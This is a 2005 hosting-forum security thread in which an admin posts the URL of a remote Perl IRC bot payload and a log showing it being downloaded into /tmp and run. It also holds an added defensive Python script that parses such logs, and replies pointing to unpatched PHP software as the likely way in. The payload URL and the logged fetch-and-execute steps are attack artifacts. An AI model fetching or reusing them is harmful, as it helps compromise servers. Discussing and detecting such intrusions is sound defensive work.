The Community Forums

Security Alert - Possible hack script here?

Discussion in 'Security' started by ricoche, Jun 29, 2005.

  1. ricoche

    Hello there,

    To Moderators: If this post is not appropriate, please modify or delete asap. Thank you.

    Today I just stumbled upon a hack attempt where someone was trying to invoke the following script. This is the entire URL with script for those interested in dissecting it and setting up some additional security measures. I've been battling this guy for quite some time and he seems to be using similar scripts to this one. So same guy, but nothing new.

    http://www.centpublications.com/images/linuxdaybot.txt

    I have done a lot of security work on the server and so far I've been OK, but if anyone does recognize this script or has experience with fighting it, please let me know. Any insight or additional tips about how to prevent this script from actually getting by on the server would be much appreciated.

    In addition, I have no idea how this is even getting pulled. I have tools such as wget completely shut down. Plus my compilers and a ton of other stuff are shut down, and yes, I have to manually enable everything if I need to get other things done. I'm used to this though, so it's part of life now. Anyway, I would love to hear any ideas about how this script could be getting in.

    Also, here is an excerpt of a log file concerning this attempt. You can see there are some compile problems and thus the script does not appear to be working? Not sure.

    Code:
    19:17:58 (345.96 KB/s) - `/tmp/php5913' saved [18,700/18,700]
    
    Backslash found where operator expected at /tmp/php5913 line 103, near "$meunick\"
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 103, near ")\"
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 117, near ")\"
      (Might be a runaway multi-line ++ string starting on line 103)
            (Missing operator before \?)
    Backslash found where operator expected at /tmp/php5913 line 122, near ")\"
            (Missing operator before \?)
    Number found where operator expected at /tmp/php5913 line 124, near "} elsif ($servarg =~ m/^\:(.+?)\s+001"
      (Might be a runaway multi-line ++ string starting on line 122)
            (Missing operator before 001?)
    Backslash found where operator expected at /tmp/php5913 line 124, near "001\"
            (Missing operator before \?)
    syntax error at /tmp/php5913 line 103, near ")\"
    syntax error at /tmp/php5913 line 117, near "'nick'} = "
    Execution of /tmp/php5913 aborted due to compilation errors.
    --19:17:58--  http://www.centpublications.com/images/linuxdaybot.txt
               => `/tmp/php5913'
    Resolving www.centpublications.com... 205.234.147.237
    Connecting to www.centpublications.com[205.234.147.237]:80... --19:17:58--  http://www.centpublications.com/images/linuxdaybot.txt
               => `/tmp/php5913'
    Resolving www.centpublications.com... 205.234.147.237
    Connecting to www.centpublications.com[205.234.147.237]:80... connected.
    HTTP request sent, awaiting response... connected.
    HTTP request sent, awaiting response... 200 OK
    
    Thank you.
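
The log excerpt in the post above, turned into a triage check (an added example, not part of the original post and not cPanel code): it parses a wget 1.x transcript interleaved with Perl diagnostics and reports each file fetched into a world-writable directory, along with whether an interpreter was pointed at it. The sample log, `www.example.com`, `192.0.2.10` and `/tmp/php1234` are constructed placeholders, and the function and field names are this example's own.

```python
import re
from urllib.parse import urlsplit

# Pieces of a wget 1.x transcript, matched anywhere in the text because the
# child's stdout and stderr arrive interleaved, as in the excerpt above.
FETCH = re.compile(r"--\d\d:\d\d:\d\d--\s+(\S+)\s+=> `([^']+)'")
SAVED = re.compile(r"`([^']+)' saved \[([\d,]+)/")
RESOLVED = re.compile(r"Resolving (\S+)\.\.\. (\d{1,3}(?:\.\d{1,3}){3})")
PERL_ERR = re.compile(r" at (/\S+) line \d+")
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample in the excerpt's format (placeholder host, IP and path).
SAMPLE = r"""
19:17:58 (345.96 KB/s) - `/tmp/php1234' saved [18,700/18,700]
Backslash found where operator expected at /tmp/php1234 line 103, near ")\"
syntax error at /tmp/php1234 line 103, near ")\"
Execution of /tmp/php1234 aborted due to compilation errors.
--19:17:58--  http://www.example.com/images/bot.txt
           => `/tmp/php1234'
Resolving www.example.com... 192.0.2.10
Connecting to www.example.com[192.0.2.10]:80... --19:17:58--  http://www.example.com/images/bot.txt
           => `/tmp/php1234'
"""


def triage(log_text):
    """Return one finding per file fetched into a world-writable directory."""
    hosts = {}
    for host, ip in RESOLVED.findall(log_text):
        hosts.setdefault(host.lower(), set()).add(ip)
    sizes = {p: int(n.replace(",", "")) for p, n in SAVED.findall(log_text)}
    ran = set(PERL_ERR.findall(log_text))
    findings = {}
    for url, path in FETCH.findall(log_text):
        if not path.startswith(WORLD_WRITABLE):
            continue
        findings[path] = {
            "path": path, "url": url,
            "ips": sorted(hosts.get(urlsplit(url).hostname, ())),
            "bytes_saved": sizes.get(path),
            # Perl diagnostics naming the file mean it was handed to the interpreter.
            "execution_attempted": path in ran,
        }
    return list(findings.values())


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A finding with `execution_attempted` set means both the download and the interpreter invocation went through, even when the payload itself failed to compile.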
     
  2. chirpy

    That's a generic IRC bot and not something specific to cPanel. They are most likely getting in through a vulnerable PHP script on the server. Make sure that all your phpBB installations (if there are any) are using the latest release.
     
  3. B12Org

    I've found most hack attempts on my servers came from outdated or unpatched PHP-Nuke installs.
     